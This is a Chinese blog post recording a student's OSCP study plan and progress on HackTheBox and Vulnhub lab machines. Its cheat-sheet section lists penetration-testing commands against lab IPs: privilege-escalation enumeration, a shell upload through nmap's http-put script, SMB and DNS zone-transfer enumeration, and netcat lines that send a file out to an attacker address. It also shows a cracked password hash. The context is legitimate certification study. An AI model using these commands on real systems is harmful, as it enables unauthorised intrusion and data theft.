oscp学习计划二期

一期

只有一点点基础知识的我
看着Google和vulnhub
一边刷练习
一边看笔记
慢慢也有了自己的知识框架
但是还是感觉准备的不充分

笔记

之前就拿CSDN做笔记了
每篇博客都很少有文字
大多都是我的操作截图
不是特别正规
为了备战
明天开始用官方的报告来写
但是他是五个一组
就是在一个文件中
要对五个靶机进行描述
希望我可以一天打五个靶机吧（现在一天最多3）
报告模板已经给了链接
有需要的可以去下载

靶机

靶机的话
之前一直练的Vulnhub
但是要下载
很费时间也很麻烦
而且网上关于win的靶机推荐
对于Vulnhub很少
目前我就看见了一个scream的
所以明天开始改用HTB
对对对！
还有BOF！！！！
都是我的短板
需要加强练习
希望刷完HTB我可以直接参加考试
附上靶机列表

总共49个靶机
加上我电脑里还有一个没做的Vulnhub
刚好50个
五个一组
可以刷10次
关于BOF的话
贴个链接
如果有小伙伴有更好的BOF学习链接的话
可以私信交流一哈

25 point buffer overflow machine
25 point behemoth riddled with rabbit holes
2 x 20 point machines
10 point machine

关于考试备考
这有个博客

介绍了几个工具以及考试经过

二期

目标

在HTB上刷完类似oscp的靶机
学会BOF
熟悉对报告的整理
进一步对渗透技术的熟练，加快打靶机的速度
对常用命令、工具以及网站进行汇总，以便于在考试的时候节省时间

一些常用命令

find / -user root -perm -4000 -print 2>/dev/nullpython3 -c 'import pty;pty.spawn("/bin/bash");'ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.48 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports -sT 10.10.10.48nmap -p 80 192.168.0.160 -script http-put -script-args http-put.url='/test/shell.php',http-put.file='shell.php'python -m SimpleHTTPServer 8000strings -n 20 *.pngfor x in 571 290 911; do nmap -Pn --max-retries 0 -p $x 10.10.10.43; doneps -l
ps aux|grep tomgcc *.c -o expuname -a
lsb_release -asmbmap -H 10.10.10.123
smbclient --list friendzone.htb -U ""
nmap -p 445 --script=smb-enum-shares 10.10.10.123
smbclient -N \\\\10.10.10.123\\Developmenthost -l friendzone.red 10.10.10.123
dig axfr @10.10.10.123 friendzone.red$1$sugar$XYG/x4tZyZcCFe2QdDiSa1   qwe123!@#nc -l -p 8003 > ovrflw              /on your kali
nc -w 5 YourIpAddress 8003 < ovrflw     /on Target

_______________________________________2020.5.2

被网络问题逼疯了
HTB挂vps能连上
但是太太太慢了
决定在vps上安装Kali
在电脑上下了几个vulnhub的靶机
先做着吧

_______________________________________2020.5.19

问题完美解决了传送门

_______________________________________2020.5.25

hack the box的靶机也刷了一大半了
本想把缓冲区留在最后
做题的时候还是没避开
就提前学了学原理和linux的利用
htb关于linux的靶机还有3个了
我觉得实战对于我来说非常有用
一边学一边练
感觉自己最近学会了很多知识
后天就要进行win的靶机练习了
不知道会怎么样
还有点慌张
希望十天之内也能刷完win的htb靶机
然后再来十天主攻缓冲区
接着就考试
尽量早点考试把
希望在七月一能结束这个证
然后趁着没开学
再考两个证
七月一个八月一个
开学
美滋滋

_______________________________________2020.5.26

今天算是完成了htb和vulnhub的所有linux靶机了
明天开始window靶机
18台+（后面提到的）17台
35台在二号完成
然后报名
七天时间熟练缓冲区和报告
我觉得足够了
六月十号开始正式的oscp实验室练习
希望十五天就能考试
因为我要做的事情太多了
今天就休息一下吧

_______________________________________2020.6.4

到今天为止
表格里的HTB靶机都刷完了
学到了很多
接下来不刷什么了
开始整理一下之前联系过的靶机的知识
收集一下脚本、工具和命令
汇总一下
在一个星期内完成
然后开始oscp的lab练习
如果快的话
希望在15天内考完
如果慢的话
也希望在7.1之前考完
网上说HTB要是oscp的难度的两倍
所以我感觉自己应该能提前通过考试吧
加油

oscp学习计划二期相关推荐

Open3d学习计划—高级篇 8（网格变形）
Open3D是一个开源库,支持快速开发和处理3D数据.Open3D在c++和Python中公开了一组精心选择的数据结构和算法.后端是高度优化的,并且是为并行化而设置的. 本系列学习计划有Blue同学作 ...
Open3d学习计划—高级篇 7（颜色映射）
Open3D是一个开源库,支持快速开发和处理3D数据.Open3D在c++和Python中公开了一组精心选择的数据结构和算法.后端是高度优化的,并且是为并行化而设置的. 本系列学习计划有Blue同学作 ...
Open3d学习计划—高级篇 6（体素化）
Open3D是一个开源库,支持快速开发和处理3D数据.Open3D在c++和Python中公开了一组精心选择的数据结构和算法.后端是高度优化的,并且是为并行化而设置的. 本系列学习计划有Blue同学作 ...
Open3d学习计划—高级篇 5（RGBD融合）
Open3D是一个开源库,支持快速开发和处理3D数据.Open3D在c++和Python中公开了一组精心选择的数据结构和算法.后端是高度优化的,并且是为并行化而设置的. 本系列学习计划有Blue同学作 ...
Open3d学习计划—高级篇 4（多视角点云配准）
本文为转载文章,原创作者为blue同学,可关注他的博客:https://blog.csdn.net/io569417668 Open3D是一个开源库,支持快速开发和处理3D数据.Open3D在c++和 ...
Open3d学习计划—高级篇 3（点云全局配准）
Open3D是一个开源库,支持快速开发和处理3D数据.Open3D在c++和Python中公开了一组精心选择的数据结构和算法.后端是高度优化的,并且是为并行化而设置的. 本系列学习计划有Blue同学作 ...
Open3d学习计划—高级篇 2（彩色点云配准）
Open3D是一个开源库,支持快速开发和处理3D数据.Open3D在c++和Python中公开了一组精心选择的数据结构和算法.后端是高度优化的,并且是为并行化而设置的. 本系列学习计划有Blue同学作 ...
Open3d 学习计划—13（Azure Kinect）
该文章为转载内容,请关注文章作者博客https://blog.csdn.net/io569417668 Open3D是一个开源库,支持快速开发和处理3D数据.Open3D在c++和Python中公开了 ...
Open3d 学习计划—12（Jupyter 可视化）
Open3D是一个开源库,支持快速开发和处理3D数据.Open3D在c++和Python中公开了一组精心选择的数据结构和算法.后端是高度优化的,并且是为并行化而设置的. 本系列学习计划有Blue同学作 ...

oscp学习计划二期

一期

笔记

靶机

二期

oscp学习计划二期相关推荐

最新文章

热门文章